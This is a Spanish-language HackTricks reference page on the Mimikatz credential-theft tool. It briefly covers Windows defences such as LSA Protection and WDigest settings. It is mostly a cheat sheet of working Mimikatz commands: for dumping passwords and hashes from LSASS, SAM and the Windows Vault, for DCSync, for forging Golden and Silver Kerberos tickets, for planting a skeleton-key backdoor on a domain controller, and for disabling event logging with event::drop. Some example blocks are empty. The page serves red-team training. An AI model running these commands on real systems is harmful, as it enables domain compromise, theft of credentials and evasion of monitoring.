Mimikatz
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Esta página se basa en una de adsecurity.org. ¡Consulta el original para más información!
Desde Windows 8.1 y Windows Server 2012 R2 en adelante, se han implementado medidas significativas para proteger contra el robo de credenciales:
Los hashes LM y las contraseñas en texto claro ya no se almacenan en memoria para mejorar la seguridad. Se debe configurar un ajuste específico del registro, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" con un valor DWORD de 0 para deshabilitar la Autenticación Digest, asegurando que las contraseñas "en texto claro" no se almacenen en caché en LSASS.
La Protección LSA se introduce para proteger el proceso de la Autoridad de Seguridad Local (LSA) de la lectura no autorizada de memoria y la inyección de código. Esto se logra marcando el LSASS como un proceso protegido. La activación de la Protección LSA implica:
Modificar el registro en HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa configurando RunAsPPL a dword:00000001.
Implementar un Objeto de Política de Grupo (GPO) que haga cumplir este cambio de registro en los dispositivos gestionados.
A pesar de estas protecciones, herramientas como Mimikatz pueden eludir la Protección LSA utilizando controladores específicos, aunque tales acciones probablemente se registren en los registros de eventos.
Los administradores suelen tener SeDebugPrivilege, lo que les permite depurar programas. Este privilegio puede ser restringido para evitar volcado de memoria no autorizado, una técnica común utilizada por los atacantes para extraer credenciales de la memoria. Sin embargo, incluso con este privilegio eliminado, la cuenta TrustedInstaller aún puede realizar volcado de memoria utilizando una configuración de servicio personalizada:
Esto permite volcar la memoria de lsass.exe a un archivo, que luego puede ser analizado en otro sistema para extraer credenciales:
La manipulación de registros de eventos en Mimikatz implica dos acciones principales: borrar registros de eventos y parchear el servicio de eventos para evitar el registro de nuevos eventos. A continuación se presentan los comandos para realizar estas acciones:
Comando: Esta acción tiene como objetivo eliminar los registros de eventos, dificultando el seguimiento de actividades maliciosas.
Mimikatz no proporciona un comando directo en su documentación estándar para borrar registros de eventos directamente a través de su línea de comandos. Sin embargo, la manipulación de registros de eventos generalmente implica el uso de herramientas del sistema o scripts fuera de Mimikatz para borrar registros específicos (por ejemplo, usando PowerShell o el Visor de Eventos de Windows).
Comando: event::drop
Este comando experimental está diseñado para modificar el comportamiento del Servicio de Registro de Eventos, evitando efectivamente que registre nuevos eventos.
Ejemplo: mimikatz "privilege::debug" "event::drop" exit
El comando privilege::debug asegura que Mimikatz opere con los privilegios necesarios para modificar servicios del sistema.
El comando event::drop luego parchea el servicio de Registro de Eventos.
Un Golden Ticket permite la suplantación de acceso a nivel de dominio. Comando clave y parámetros:
Comando: kerberos::golden
Parámetros:
/domain: El nombre del dominio.
/sid: El Identificador de Seguridad (SID) del dominio.
/user: El nombre de usuario a suplantar.
/krbtgt: El hash NTLM de la cuenta de servicio KDC del dominio.
/ptt: Inyecta directamente el ticket en la memoria.
/ticket: Guarda el ticket para su uso posterior.
Ejemplo:
Los Silver Tickets otorgan acceso a servicios específicos. Comando clave y parámetros:
Comando: Similar al Golden Ticket pero se dirige a servicios específicos.
Parámetros:
/service: El servicio a atacar (por ejemplo, cifs, http).
Otros parámetros similares al Golden Ticket.
Ejemplo:
Los Tickets de Confianza se utilizan para acceder a recursos a través de dominios aprovechando las relaciones de confianza. Comando clave y parámetros:
Comando: Similar al Golden Ticket pero para relaciones de confianza.
Parámetros:
/target: El FQDN del dominio objetivo.
/rc4: El hash NTLM para la cuenta de confianza.
Ejemplo:
Listing Tickets:
Command: kerberos::list
Lista todos los tickets de Kerberos para la sesión de usuario actual.
Pass the Cache:
Command: kerberos::ptc
Inyecta tickets de Kerberos desde archivos de caché.
Example: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Pass the Ticket:
Command: kerberos::ptt
Permite usar un ticket de Kerberos en otra sesión.
Example: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Purge Tickets:
Command: kerberos::purge
Borra todos los tickets de Kerberos de la sesión.
Útil antes de usar comandos de manipulación de tickets para evitar conflictos.
DCShadow: Hacer que una máquina actúe temporalmente como un DC para la manipulación de objetos de AD.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Imitar un DC para solicitar datos de contraseña.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: Extraer credenciales de LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Suplantar un DC usando los datos de contraseña de una cuenta de computadora.
No se proporciona un comando específico para NetSync en el contexto original.
LSADUMP::SAM: Acceder a la base de datos SAM local.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Desencriptar secretos almacenados en el registro.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Establecer un nuevo hash NTLM para un usuario.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Recuperar información de autenticación de confianza.
mimikatz "lsadump::trust" exit
MISC::Skeleton: Inyectar un backdoor en LSASS en un DC.
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: Adquirir derechos de respaldo.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Obtener privilegios de depuración.
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: Mostrar credenciales de usuarios conectados.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Extraer tickets de Kerberos de la memoria.
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: Cambiar SID y SIDHistory.
Add: mimikatz "sid::add /user:targetUser /sid:newSid" exit
Modify: No se proporciona un comando específico para modificar en el contexto original.
TOKEN::Elevate: Suplantar tokens.
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: Permitir múltiples sesiones RDP.
mimikatz "ts::multirdp" exit
TS::Sessions: Listar sesiones TS/RDP.
No se proporciona un comando específico para TS::Sessions en el contexto original.
Extraer contraseñas del Windows Vault.
mimikatz "vault::cred /patch" exit
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
